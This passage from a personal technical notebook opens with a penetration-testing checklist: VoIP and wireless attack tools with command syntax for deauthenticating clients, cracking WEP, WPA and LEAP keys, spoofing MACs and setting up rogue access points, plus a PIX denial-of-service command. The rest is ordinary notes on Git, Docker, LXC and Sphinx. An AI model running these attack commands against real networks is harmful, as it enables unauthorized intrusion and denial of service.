./redirectpoison interface target_source_ip target_source_port “” Registration Adder Registration Eraser Registration Hijacker SIP-Kill SIP-Proxy-Kill SIP- RedirectRTP SipRogue vnak Media Manipulation Tools RTP InsertSound ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip des- tination_rtp_port file RTP MixSound ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip desti- nation_rtp_port file RTPProxy RTPInject Generic Software Suites OAT Office Communication Server Tool Assessment EnableSecurity VOIP- PACK Note: - Add-on for Immunity Canvas References URL’s Common Vulnerabilities and Exploits (CVE) Vulnerabilties and exploit information re- lating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi? keyword=voip Default Passwords Hacking Exposed VoIP Tool Pre-requisites Hack Library g711conversions VoIPsa White Papers An Analysis of Security Threats and Tools in SIP-Based VoIP Systems An Analysis of VoIP Security Threats and Tools Hacking VoIP Exposed Security testing of SIP implemen- tations SIP Stack Fingerprinting and Stack Difference Attacks Two attacks against VoIP VoIP Attacks! VoIP Security Audit Program (VSAP) Vulnerability Assessment Vulnerability Assessment - Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.

Manual Patch Levels Confirmed Vulnerabilities Severe High Medium Low Automated Reports Vulnerabilities Severe High Medium Low Tools GFI Nessus (Linux) Nessus (Windows) NGS Typhon NGS Squirrel for Oracle NGS Squirrel for SQL SARA MatriXay BiDiBlah SSA Oval Interpreter Xscan Security Manager + Inguma Resources Security Focus Microsoft Security Bulletin Common Vulnerabilities and Exploits (CVE) National Vulnerability Database (NVD) The Open Source Vulnerability Database (OSVDB) Standalone Database Update URL

364 Chapter 48. Security Omid Raha MyStack Documentation, Release 0.1

United States Computer Emergency Response Team (US-CERT) Computer Emergency Re- sponse Team Mozilla Security Information SANS Securiteam PacketStorm Security Security Tracker Secunia Vulnerabilities.org ntbugtraq Wireless Vulnerabilities and Exploits (WVE) Blogs Carnal0wnage Fsecure Blog g0ne blog GNUCitizen ha.ckers Blog Jeremiah Grossman Blog Metasploit nCircle Blogs pentest mokney.net Rational Security Rise Security Security Fix Blog Software Vulnerability Exploitation Blog Taosecurity Blog Wireless Penetration Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.

Site Map RF Map Lines of Sight Coverage Standard Antenna Directional Antenna Physical Map Triangulate APs Satellite Imagery Network Map MAC Filter Authorised MAC Addresses Reaction to Spoofed MAC Addresses Encryption Keys utilised WEP Key Length Crack Time Key WPA/PSK TKIP Temporal Key Integrity Protocol, (TKIP), is an encryption protocol desgined to replace WEP Key Attack Time AES Advanced Encryption Standard (AES) is an encryption algorithm utilised for securing sensitive data. Key Attack Time 802.1x Derivative of 802.1x in use Access Points ESSID Extended Service Set Identifier, (ESSID). Utilised on wireless networks with an access point Broadcast ESSIDs BSSIDs Basic service set identifier, (BSSID), utilised on ad-hoc wireless networks. Vendor Channel Associations Rogue AP Activity Wireless Clients MAC Addresses Vendor Operating System Details Adhoc Mode Associations Intercepted Traffic Encrypted Clear Text Wireless Toolkit Wireless Discovery Aerosol Airfart Aphopper Apradar BAFFLE karma Kismet MiniStumbler Netstumbler Wellenreiter Wifi Hopper WirelessMon

48.3. Penetration 365 Omid Raha MyStack Documentation, Release 0.1

Packet Capture Airopeek Airtraf Apsniff Cain Wireshark EAP Attack tools eapmd5pass eapmd5pass -w dictionary_file -r eapmd5-capture.dump eapmd5pass -w dictionary_file -U username -C EAP-MD5 Chal- lengevalue -R EAP_MD5_Response_value -E 2 EAP-MD5 Response EAP ID Value i.e. -C e4:ef:ff:cf:5a:ea:44:7f:9a:dd:4f:3b:0e:f4:4d:20 -R 1f:fd:6c:46:49:bc:5d:b9:11:24:cd:02:cb:22:6d:37 -E 2 Leap Attack Tools asleap thc leap cracker anwrap WEP/ WPA Password Attack Tools Aircrack-ptw Aircrack-ng Airsnort cowpatty wep attack wep crack Airbase wzcook Frame Generation Software Airgobbler airpwn Airsnarf Commview fake ap void 11 wifi tap wifitap -b [-o ] [-i [-p] [-w [-k ]] [-d [-v]] [-h] FreeRADIUS - Wireless Pwnage Edition Mapping Software Knsgem File Format Conversion Tools ns1 recovery and conversion tool warbable warkizniz warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename] ivstools IDS Tools WIDZ War Scanner Snort-Wireless AirDefense AirMagnet WLAN discovery Unencrypted WLAN Visible SSID Sniff for IP range MAC authorised MAC filtering Spoof valid MAC Linux ifconfig [interface] hw ether [MAC] macchanger Random Mac Address:- macchanger -r eth0 mac address changer for windows madmacs TMAC SMAC Hidden SSID Deauth client Aireplay-ng aireplay -0 1 -a [Access Point MAC] -c [Client MAC] [interface] Commview Tools > Node reassociation Void11 void11_penetration wlan0 -D -t 1 -B [MAC] WEP encrypted WLAN Visible SSID WEPattack wepattack -f [dumpfile] -m [mode] -w [wordlist] -n [network] Capture / Inject packets Break WEP

366 Chapter 48. Security Omid Raha MyStack Documentation, Release 0.1

Aircrack-ptw aircrack-ptw [pcap file] Aircrack-ng aircrack -q -n [WEP key length] -b [BSSID] [pcap file] Airsnort Channel > Start WEPcrack perl WEPCrack.pl ./pcap-getIV.pl -b 13 -i wlan0 Hidden SSID Deauth client Aireplay-ng aireplay -0 1 -a [Access Point MAC] -c [Client MAC] [interface] Commview Tools > Node reassociation Void11 void11_hopper void11_penetration [interface] -D -s [type of attack] -s [station MAC] -S [SSID] -B [BSSID] WPA / WPA2 encrypted WLAN Deauth client Capture EAPOL handshake WPA / WPA 2 dictionary attack coWPAtty ./cowpatty -r [pcap file] -f [wordlist] -s [SSID] ./genpmk -f dic- tionary_file -d hashfile_name -s ssid ./cowpatty -r cature_file.cap -d hashfile_name -s ssid Aircrack-ng aircrack-ng -a 2 -w [wordlist] [pcap file] LEAP encrypted WLAN Deauth client Break LEAP asleap ./asleap -r data/libpcap_packet_capture_file.dump -f output_pass+hash file.dat -n output_index_filename.idx ./genkeys -r dictionary_file -f out- put_pass+hash file.dat -n output_index_filename.idx THC-LEAPcracker leap-cracker -f [wordlist] -t [NT challenge response] -c [challenge] 802.1x WLAN Create Rogue Access Point Airsnarf Deauth client Associate client Compromise client Acquire passphrase / certificate wzcook Obtain user’s certificate fake ap perl fakeap.pl –interface wlan0 perl fakeap.pl –interface wlan0 –channel 11 –essid fake_name –wep 1 –key [WEP KEY] Hotspotter Deauth client Associate client

48.3. Penetration 367 Omid Raha MyStack Documentation, Release 0.1

Compromise client Acquire passphrase / certificate wzcook Obtain user’s certificate Karma Deauth client Associate client Compromise client Acquire passphrase / certificate wzcook Obtain user’s certificate ./bin/karma etc/karma-lan.xml Linux rogue AP Deauth client Associate client Compromise client Acquire passphrase / certificate wzcook Obtain user’s certificate Resources URL’s Wirelessdefence.org Russix Wardrive.net Wireless Vulnerabilities and Exploits (WVE) White Papers Weaknesses in the Key Scheduling Algorithm of RC4 802.11b Firmware- Level Attacks Wireless Attacks from an Intrusion Detection Perspective Implementing a Secure Wireless Network for a Windows Environment Breaking 104 bit WEP in less than 60 seconds PEAP Shmoocon2008 Wright & Antoniewicz Active behavioral fingerprinting of wireless devices Common Vulnerabilities and Exploits (CVE) Vulnerabilties and exploit information re- lating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi? keyword=wireless Penetration Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.

Password Attacks Known Accounts Identified Passwords Unidentified Hashes Default Accounts Identified Passwords Unidentified Hashes Exploits Successful Exploits Accounts Passwords Cracked Uncracked Groups Other Details Services Backdoor Connectivity Unsuccessful Exploits Resources Securiteam Exploits are sorted by year and must be downloaded individually SecurityForest Updated via CVS after initial install

368 Chapter 48. Security Omid Raha MyStack Documentation, Release 0.1

GovernmentSecurity Need to create and account to obtain access Red Base Security Oracle Exploit site only Wireless Vulnerabilities & Exploits (WVE) Wireless Exploit Site PacketStorm Security Exploits downloadable by month and year but no index- ing carried out. SecWatch Exploits sorted by year and month, download seperately SecurityFocus Exploits must be downloaded individually Metasploit Install and regualrly update via svn Milw0rm Exploit archived indexed and sorted by port download as a whole - The one to go for! Tools Metasploit Free Extra Modules local copy Manual SQL Injection Understanding SQL Injection SQL Injection walkthrough SQL In- jection by example Blind SQL Injection Advanced SQL Injection in SQL Server More Advanced SQL Injection Advanced SQL Injection in Oracle databases SQL Cheat- sheets http://ha.ckers.org/sqlinjection http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ http://www.0x000000.com/?i=14 http://pentestmonkey.net/ SQL Power Injector SecurityForest SPI Dynamics WebInspect Core Impact Cisco Global Exploiter PIXDos perl PIXdos.pl [ –device=interface ] [–source=IP] [–dest=IP] [–sourcemac=M AC] [–destmac=MAC] [–port=n] CANVAS Inguma

48.3. Penetration 369 Omid Raha MyStack Documentation, Release 0.1

370 Chapter 48. Security CHAPTER 49

Metasploit

Contents:

49.1 Tips

49.1.1 APDU command to get smart card uid from smartcard.scard import * hresult, hcontext= SCardEstablishContext(SCARD_SCOPE_USER) assert hresult==SCARD_S_SUCCESS hresult, readers= SCardListReaders(hcontext, []) assert len(readers)>0 reader= readers[0] hresult, hcard, dwActiveProtocol= SCardConnect( hcontext, reader, SCARD_SHARE_SHARED, SCARD_PROTOCOL_T0| SCARD_PROTOCOL_T1) hresult, response= SCardTransmit(hcard,dwActiveProtocol,[0xFF,0xCA,0x00,0x00,0x00]) print(response) https://stackoverflow.com/a/26689054

371 Omid Raha MyStack Documentation, Release 0.1

372 Chapter 49. Metasploit CHAPTER 50

Sphinx

Contents:

50.1 Tips

50.1.1 How do we embed images in sphinx docs?

.. image:: example.png :width: 480pt

The path to the image is relative to the file. http://sphinx-doc.org/rest.html?highlight=image#images http://openalea.gforge.inria.fr/doc/openalea/doc/_build/html/source/sphinx/rest_syntax.html#directives

50.1.2 Document your Django projects: reStructuredText and Sphinx http://www.marinamele.com/2014/03/document-your-django-projects.html

50.1.3 Generating Code Documentation With Pycco

$ pip install pycco $ cd to/root/of/project $ pycco **/*.py -p -i https://realpython.com/blog/python/generating-code-documentation-with-pycco/

373 Omid Raha MyStack Documentation, Release 0.1

50.1.4 First Steps with Sphinx

$ pip install Sphinx $ sphinx-quickstart http://www.sphinx-doc.org/en/stable/tutorial.html

50.2 Links

374 Chapter 50. Sphinx CHAPTER 51

Sport

Contents:

51.1 Body Building

51.1.1 Natural body building http://en.wikipedia.org/wiki/Natural_bodybuilding http://www.true-natural-bodybuilding.com/training.html http://en.wikipedia.org/wiki/Performance-enhancing_drugs hypertrophy doping (anabolic steroids, growth hormone, insulin)

375 Omid Raha MyStack Documentation, Release 0.1

376 Chapter 51. Sport CHAPTER 52

Version Control System

Contents:

52.1 Git https://github.com/k88hudson/git-flight-rules

52.1.1 Set push.default warning: push.default is unset; its implicit value has changed in Git 2.0 from ‘matching’ to ‘simple’. To squelch this message and maintain the traditional behavior, use: git config –global push.default matching To squelch this message and adopt the new behavior now, use: git config –global push.default simple When push.default is set to ‘matching’, git will push local branches to the remote branches that already exist with the same name. Since Git 2.0, Git defaults to the more conservative ‘simple’ behavior, which only pushes the current branch to the corresponding remote branch that ‘git pull’ uses to update the current branch. See ‘git help config’ and search for ‘push.default’ for further information. (the ‘simple’ mode was introduced in Git 1.7.11. Use the similar mode ‘current’ instead of ‘simple’ if you sometimes use older versions of Git)

$ git config --global push.default simple

377 Omid Raha MyStack Documentation, Release 0.1

52.1.2 Untrack and stop tracking files in git

$ git rm -r --cached .

52.1.3 Create new git project in bitbucket

$ mkdir /path/to/your/new_project

$ cd /path/to/your/new_project

$ git init

$ git remote add origin [email protected]:omidraha/new_project.git

$ git push -u origin master

52.1.4 Remove local (untracked) files from current Git branch http://git-scm.com/docs/git-clean http://stackoverflow.com/questions/61212/remove-local-untracked-files-from-my-current-git-branch

$ git clean

# If the Git configuration variable clean.requireForce is not set to false, # git clean will refuse to run unless given -f, -n or -i. $ git clean -f

# Remove untracked directories in addition to untracked files. $ git clean -f -d # git clean -fd

# Remove only files ignored by Git. # This may be useful to rebuild everything from scratch, but keep manually created

˓→files $ git clean -f -X # git clean -fX

52.1.5 Install Git

$ sudo apt-get install git-core $ git --version

52.1.6 Configure Git https://github.com/yui/yui3/wiki/Set-Up-Your-Git-Environment

$ git config --global user.name "Omid Raha" $ git config --global user.email [email protected]

$ vim ~/.gitconfig

(continues on next page)

378 Chapter 52. Version Control System Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) [user] name= Omid Raha email= [email protected] [push] default= simple [core] autocrlf= input [alias] st= status ci= commit co= checkout br= branch

$ vim ~/.gitignore

.DS_Store ._* .svn .hg .*.swp

52.1.7 git commit as different user

$ git commit --author="Name " -m "whatever"

52.1.8 Setting your username and email in Git

https://help.github.com/articles/setting-your-username-in-git/ https://help.github.com/articles/setting-your-email-in-git/ Git uses your username and email address to associate commits with an identity. The git config command can be used to change your Git configuration, including your username and email address, It takes two arguments: The setting you want to change–in this case, user.name or user.email Your new name, for example, Billy Everyteen Your new email, for example, [email protected]

To set your username and email for a specific repository

Enter the following command in the root folder of your repository:

# Set a new name $ git config user.name "Billy Everyteen"

# Set a new email $ git config user.email "[email protected]"

# Verify the new name $ git config user.name # Billy Everyteen (continues on next page)

52.1. Git 379 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page)

# Verify the new email $ git config user.name # [email protected]

To set your username and email for every repository on your computer

Navigate to your repository from a command-line prompt. Set your username and email with the following command.

$ git config --global user.name "Billy Everyteen" $ git config --global user.email "[email protected]"

Confirm that you have set your username and email correctly with the following command.

$ git config --global user.name # Billy Everyteen

$ git config --global user.email # # [email protected]

To set your username and email for a single repository

Navigate to your repository from a command-line prompt. Set your username and email with the following command.

$ git config user.name "Billy Everyteen" $ git config user.email "[email protected]"

Confirm that you have set your username and email correctly with the following command.

$ git config user.name # Billy Everyteen

$ git config user.email # [email protected]

52.1.9 Setting up a git server http://git-scm.com/book/en/v2/Git-on-the-Server-Setting-Up-the-Server Let’s walk through setting up SSH access on the server side. In this example, you’ll use the authorized_keys method for authenticating your users. We also assume you’re running a standard Linux distribution like Ubuntu. First, you create a git user and a .ssh directory for that user.

$ sudo adduser git $ su git $ cd $ mkdir .ssh&& chmod 700 .ssh $ touch .ssh/authorized_keys&& chmod 600 .ssh/authorized_keys

380 Chapter 52. Version Control System Omid Raha MyStack Documentation, Release 0.1

Next, you need to add some developer SSH public keys to the authorized_keys file for the git user. Let’s assume you have some trusted public keys and have saved them to temporary files. Again, the public keys look something like this:

$ cat /tmp/id_rsa.john.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCB007n/ww+ouN4gSLKssMxXnBOvf9LGt4L ojG6rs6hPB09j9R/T17/x4lhJA0F3FR1rP6kYBRsWj2aThGw6HXLm9/5zytK6Ztg3RPKK+4k Yjh6541NYsnEAZuXz0jTTyAUfrtU3Z5E003C4oxOj6H0rfIF1kKI9MAQLMdpGW1GYEIgS9Ez Sdfd8AcCIicTDWbqLAcU4UpkaX8KyGlLwsNuuGztobF8m72ALC/nLF6JLtPofwFBlgc+myiv O7TCUSBdLQlgMVOFq1I2uPWQOkOWQAHukEOmfjy2jctxSDBQ220ymjaNsHT4kgtZg2AYYgPq dAv8JggJICUvax2T9va5 gsg-keypair

You just append them to the git user’s authorized_keys file in its .ssh directory:

$ cat /tmp/id_rsa.john.pub >> ~/.ssh/authorized_keys

Now, you can set up an empty repository for them by running git init with the –bare option, which initializes the repository without a working directory:

$ cd /path/to/prj $ git init --bare sample_prj.git

Then, John, Josie, or Jessica can push the first version of their project into that repository by adding it as a remote and pushing up a branch. Note that someone must shell onto the machine and create a bare repository every time you want to add a project.

# on Johns computer $ cd myproject $ git init $ git add . $ git commit -m 'initial commit' $ git remote add origin git@gitserver:/path/to/prj/sample_prj.git $ git push origin master

At this point, the others can clone it down and push changes back up just as easily:

$ git clone git@gitserver:/path/to/prj/sample_prj.git $ cd project $ vim README $ git commit -am 'fix for the README file' $ git push origin master

52.1.10 How do you discard unstaged changes in Git?

$ git checkout -- . http://stackoverflow.com/questions/52704/how-do-you-discard-unstaged-changes-in-git

52.1.11 Working on github API

$ pip install pygithub3

52.1. Git 381 Omid Raha MyStack Documentation, Release 0.1

from pygithub3 import Github g= Github() repo==g.repos.get('django','django')

52.1.12 Find good forks on GitHub http://forked.yannick.io http://forked.yannick.io/django/django

52.1.13 IDE http://www.syntevo.com/smartgit/download

52.1.14 Undo changes in one file

$ git checkout /path/of/changed/file

52.1.15 List local and remote branches

$ git branch -a

52.1.16 List remote branches

$ git branch -r

52.1.17 List only local branches

$ git branch

With no arguments, existing branches are listed and the current branch will be highlighted with an asterisk.

52.1.18 Delete a Git branch both locally and remotely

To remove a local branch from your machine:

$ git branch -d

The -D force deletes, -d gives you a warning if it’s not already merged in. To remove a remote branch from the server:

# As of Git v1.7.0, you can delete a remote branch using $ git push origin --delete # which is easier to remember than $ git push origin :

382 Chapter 52. Version Control System Omid Raha MyStack Documentation, Release 0.1 http://stackoverflow.com/a/2003515

52.1.19 Merge a git branch into master

$ git checkout master $ git merge

52.1.20 Remove last commit from remote git repository

$ git pull # use `git update-ref -d HEAD` instead, if it's initial git commit $ git reset HEAD^ # now some committed files be unstage # we can do git checkout for those files # force-push the new HEAD commit $ git push origin +HEAD http://stackoverflow.com/questions/8225125/remove-last-commit-from-remote-git-repository https://stackoverflow. com/a/6637891

$ git stash $ git status $ git stash list $ git stash apply https://git-scm.com/book/en/v1/Git-Tools-Stashing

52.1.21 Undo the last commit from local git reset --soft HEAD~ http://stackoverflow.com/a/927386

52.1.22 Revert to specific commit git reset 56e05fced #resets index to former commit; replace '56e05fced' with your

˓→commit code git reset --soft HEAD@{1} #moves pointer back to previous HEAD git commit -m "Revert to 56e05fced" git reset --hard #updates working copy to reflect the new commit git push

52.1.23 19 Tips For Everyday Git Use http://www.alexkras.com/19-git-tips-for-everyday-use/

52.1. Git 383 Omid Raha MyStack Documentation, Release 0.1

52.1.24 How to Write a Git Commit Message http://chris.beams.io/posts/git-commit/ https://gist.github.com/adeekshith/cd4c95a064977cdc6c50

52.1.25 Adding an existing project to GitHub using the command line

First create a new repository from github web site, Then: git remote add origin https://github.com//.git git push -u origin master

Also if project does not exist on your local, create it with: echo "# " >> README.md git init git add README.md git commit -m "first commit" git remote add origin https://github.com//.git git push -u origin master

52.1.26 Add tag https://git-scm.com/book/en/v2/Git-Basics-Tagging

Listing Your Tags

Listing the available tags in Git is straightforward. Just type git tag:

$ git tag v0.1 v1.3

Annotated Tags

Creating an annotated tag in Git is simple. The easiest way is to specify -a when you run the tag command:

$ git tag -a v1.4 -m "my version 1.4" $ git tag v0.1 v1.3 v1.4

Lightweight Tags

Another way to tag commits is with a lightweight tag. This is basically the commit checksum stored in a file – no other information is kept. To create a lightweight tag, don’t supply the -a, -s, or -m option:

384 Chapter 52. Version Control System Omid Raha MyStack Documentation, Release 0.1

$ git tag v1.4-lw $ git tag v0.1 v1.3 v1.4 v1.4-lw v1.5

52.1.27 Tag an older commit in Git? git tag -a v1.2 9fceb02 -m "Message here"

52.1.28 Push a tag to a remote repository

$ git push --follow-tags http://stackoverflow.com/questions/5195859/push-a-tag-to-a-remote-repository-using-git

52.1.29 Remove (delete) a tag

$ git push --delete origin tag_name # delete the local tag $ git tag --delete tag_name

52.1.30 Github “fatal: remote origin already exists” http://stackoverflow.com/a/10904450

$ git remote set-url origin [email protected]:ppreyer/first_app.git

52.1.31 Install specific git commit with pip

$ cat requirements.txt git+https://github.com/Tivix/django-rest-auth.

˓→git@976b3bbe4dded03552218c1022ee95d8bdf1176c

$ pip install -r requirements.txt # It's a warning, not an error. Could not find a tag or branch '976b3bbe4dded03552218c1022ee95d8bdf1176c',

˓→assuming commit. https://pip.pypa.io/en/stable/reference/pip_install/#git

52.1.32 Rewriting the most recent commit message

52.1. Git 385 Omid Raha MyStack Documentation, Release 0.1

$ git commit --amend $ git push --force https://help.github.com/articles/changing-a-commit-message/

52.1.33 git subtrees

$ cd /to/root/of/one/project/ $ git remote add sub-prj [email protected]:omidraha/sub-prj.git $ git subtree add --prefix=src/sub-prj sub-prj dev

To update subtree project:

$ cd /to/root/of/one/project/ $ git subtree pull -P src/sub-prj sub-prj dev https://medium.com/@v/git-subtrees-a-tutorial-6ff568381844#.b923kyieb http://stackoverflow.com/questions/18661894/git-updating-subree-how-can-i-update-my-subtree

52.1.34 Git fetch remote branch

Checkout to a new remote branch that exists only on the remote, but not locally

$ git fetch origin http://stackoverflow.com/a/16608774

52.1.35 Sample release

Add tag and merge dev to mater git checkout dev git pull git tag -a2.0.1 -m "2.0.1" git push --follow-tags git checkout master git pull git merge dev git push --follow-tags git checkout dev

52.1.36 Warning: push.default is unset; its implicit value is changing in Git 2.0 warning: push.default is unset; its implicit value is changing in Git 2.0 from ‘matching’ to ‘simple’. To squelch this message and maintain the current behavior after the default changes, use: git config --global push.default matching

To squelch this message and adopt the new behavior now, use:

386 Chapter 52. Version Control System Omid Raha MyStack Documentation, Release 0.1

git config --global push.default simple matching means git push will push all your local branches to the ones with the same name on the remote. This makes it easy to accidentally push a branch you didn’t intend to. simple means git push will push only the current branch to the one that git pull would pull from, and also checks that their names match. This is a more intuitive behavior, which is why the default is getting changed to this. https://stackoverflow.com/a/13148313

52.1.37 Fatal: The upstream branch of your current branch does not match the name of your current branch. git checkout rc git push fatal: The upstream branch of your current branch does not match the name of your current branch. To push to the upstream branch on the remote, use git push origin HEAD:v1.1

To push to the branch of the same name on the remote, use git push origin v0.2

Git keeps track of which local branch goes with which remote branch. When you renamed the remote branch, git lost track of which remote goes with your local rc branch. You can fix this using the –set-upstream-to or -u flag for the branch command. git branch -u origin/rc https://stackoverflow.com/a/27261804

52.1.38 Abort the merge

# git merge --abort

52.1.39 Track remote branch that doesn’t exist on local

Sometimes remote branch is not tracked on local, and there is no the branch name on the local: Related error: Git: cannot checkout branch - error: pathspec did not match any file(s) known to git

$ git branch master dev

$ git branch -a

remotes/origin/master remotes/origin/dev remotes/origin/rc

52.1. Git 387 Omid Raha MyStack Documentation, Release 0.1

$ git remote update $ git fetch --all $ git checkout --track remotes/origin/rc

$ git branch master rc dev

52.1.40 Fix git remote fatal: index-pack failed

Traceback: or@omid:~/ws$ git clone [email protected]:example/example.git Cloning into 'example'... remote: Counting objects: 39831, done. remote: Compressing objects: 100%(16929/16929), done. Connection to bitbucket.org closed by remote host. 163.00 KiB/s fatal: The remote end hung up unexpectedly fatal: early EOFs: 99%(39758/39831), 19.57 MiB | 166.00 KiB/s fatal: index-pack failed

Solution:

$ git config --global core.compression0 $ git clone --depth1 [email protected]:example/example.git # retrieve the rest of the clone $ git fetch --unshallow # or, alternately: $ git fetch --depth=2147483647 $ git pull --all

52.2 Hg

388 Chapter 52. Version Control System CHAPTER 53

Virtualization

Contents:

53.1 LXC

$ sudo -create -t debian -n p1

Checking cache download in /var/cache/lxc/debian/rootfs-wheezy-amd64 ... Downloading debian minimal ... Download complete. Copying rootfs to /var/lib/lxc/p1/rootfs...Generating locales(this might take a

˓→while)... en_US.UTF-8... done Generation complete. update-rc.d: using dependency based boot sequencing update-rc.d: using dependency based boot sequencing update-rc.d: using dependency based boot sequencing update-rc.d: using dependency based boot sequencing Creating SSH2 RSA key; this may take some time ... Creating SSH2 DSA key; this may take some time ... Creating SSH2 ECDSA key; this may take some time ... invoke-rc.d: policy-rc.d denied execution of restart.

Current default time zone: 'Asia/Tehran' Local time is now: Sun Jun 29 16:51:56 IRDT 2014. Universal Time is now: Sun Jun 29 12:21:56 UTC 2014.

Root password is 'root', please change !

389 Omid Raha MyStack Documentation, Release 0.1

53.2 DOCKER

$ docker version $ docker search repo $ docker pull username/repo $ docker run learn/tutorial echo "hello world" $ docker run learn/tutorial apt-get install -y ping # shows information about running containers $ docker ps # shows information about running nd stopped containers $ docker ps -a # return the details of the last container started $ docker ps -l # create a new container $ docker run IMAGE_ID CMD PARAMS # tells Docker to run the container in the background. $ docker run -d IMAGE_ID # to docker map any ports exposed in our image to our host. $ docker run -P IMAGE_ID $ docker run -p 5000:5000 IMAGE_ID $ docker inspect IMAGE_ID $ docker run -i -t IMAGE_ID /bin/bash # Create a new image from a container's changes $ docker commit CONTAINER_ID IMAGE_NAME # The -m flag allows us to specify a commit message, much like you would with a

˓→commit on a version control system. $ docker commit CONTAINER_ID IMAGE_NAME -m="COMMIT MESSAGE" # The -a flag allows us to specify an author for our update $ docker commit CONTAINER_ID IMAGE_NAME -a="Author Name" # Examine the processes running inside the container $ docker top CONTAINER_ID # restart the old container again $ docker start CONTAINER_ID $ docker stop CONTAINER_ID # Attach to a running container $ docker attach CONTAINER_ID # docker execute an command on container and keep stdin interactive $ docker exec -it CONTAINER_ID /bin/bash # Build an image from a Dockerfile $ docker build -t IMAGE_TAG_NAME FOLDER_PATH_OF_DOCKER_FILE # Add a tag to an existing image after you commit or build it. $ docker tag IMAGE_ID IMAGE_REPOSITORY_NAME:NEW_TAG_NAME # Remove image from Docker host $ docker rmi IMAGE_ID $ docker inspect CONTAINER_ID | grep IPAddress | cut -d '"' -f4. # Narrow down the information we want to return by requesting a specific element $ docker inspect -f '{{ .NetworkSettings.IPAddress }}' CONTAINER_ID $ docker logs CONTAINER_ID # This causes the docker logs command to act like the tail -f command and watch the

˓→container's standard out. $ docker logs -f CONTAINER_ID # Adding a data volume $ docker run -i -t -v /HOST/DIRECTORY IMAGE_ID CMD # Mount a host directory as a data volume using the -v flag $ docker run -i -t -v /HOST/DIRECTORY:/CONTAINER/DIRECTORY IMAGE_ID CMD # Docker defaults to a read-write volume but we can also mount a directory read-only. $ docker run -i -t -v /ONE/PATH/IN/HOST:/ONE/PATH/IN/CONTAINER:ro IMAGE_ID CMD (continues on next page)

390 Chapter 53. Virtualization Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) $ docker images --tree # Remove all Exited Docker containers $ docker ps -a | grep Exited | cut -d'' -f1 | xargs docker rm $ docker ps -a | grep Exited | awk '{print $1}'| xargs docker rm $ docker rm $(docker ps -a -q) # remove images $ docker images | grep none | awk '{print $3}'| xargs docker rmi # remove all images $ docker rmi $(docker images -q) # remove container after running $ docker run --rm -i -t IMAGE_ID CMD

Note: An image can’t have more than 127 layers regardless of the storage driver. This limitation is set globally to encourage optimization of the overall size of images.

53.2.1 Create base kali image http://www.jamescoyle.net/how-to/1503-create-your-first-docker-container

# Install dependencies (debbootstrap) apt-get install debootstrap

# Fetch the latest Kali debootstrap script from git curl "http://git.kali.org/gitweb/?p=packages/debootstrap.git;a=blob_plain;f=scripts/

˓→kali;hb=HEAD" > kali-debootstrap

# Download kali packages debootstrap kali ./kali-root http://http.kali.org/kali ./kali-debootstrap

# Create image tar -C kali-root -c . | docker import - kali_base_1.0.9

# Run image docker run -t -i kali_base_1.0.9 /bin/bash

53.2.2 Install docker on Debian

$ sudo apt-get purge lxc-docker* $ sudo apt-get purge docker.io* $ sudo apt-get update $ sudo apt-get install apt-transport-https ca-certificates $ sudo apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys

˓→58118E89F3A912897C070ADBF76221572C52609D $ sudo vim /etc/apt/sources.list.d/docker.list # On Debian Stretch/Sid deb https://apt.dockerproject.org/repo debian-stretch main $ sudo apt-get update $ sudo apt-cache policy docker-engine $ sudo apt-get install docker-engine $ sudo service docker start https://docs.docker.com/engine/installation/debian/

53.2. DOCKER 391 Omid Raha MyStack Documentation, Release 0.1

53.2.3 Install docker on Ubuntu Server https://docs.docker.com/engine/installation/linux/docker-ce/ubuntu/#set-up-the-repository

$ sudo apt-get update $ sudo apt-get install apt-transport-https ca-certificates curl software-properties-

˓→common $ curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add - $ sudo add-apt-repository"deb [arch=amd64] https://download.docker.com/linux/ubuntu

˓→$(lsb_release -cs) stable" $ sudo apt-get update $ sudo apt-get install docker-ce

53.2.4 Set HTTP Proxy for docker https://docs.docker.com/engine/articles/systemd/#http-proxy

# systemctl status docker | grep Loaded Loaded: loaded(/lib/systemd/system/docker.service; enabled; vendor preset:

˓→enabled)

$ vim /lib/systemd/system/docker.service

Add Environment to docker.service:

[Service] Environment="HTTP_PROXY=http://127.0.0.1:8080/" "NO_PROXY=localhost,127.0.0.1"

$ sudo systemctl show docker --property Environment $ sudo systemctl daemon-reload $ sudo systemctl show docker --property Environment $ sudo systemctl restart docker

53.2.5 Set HTTP Proxy for docker on Ubuntu 12.04.3 LTS

$ sudo vim /etc/default/docker export http_proxy="http://PROXY_IP:PROXY_PORT" $ sudo service docker restart http://stackoverflow.com/questions/26550360/docker-ubuntu-behind-proxy

53.2.6 how to let docker container work with sshuttle? we need -l 0.0.0.0 so that docker containers with “remote ip” can connect to the tunnel.

$ sshuttle -l0.0.0.0 -vvr @0/0 http://stackoverflow.com/a/30837252

392 Chapter 53. Virtualization Omid Raha MyStack Documentation, Release 0.1

53.2.7 How can I use docker without sudo?

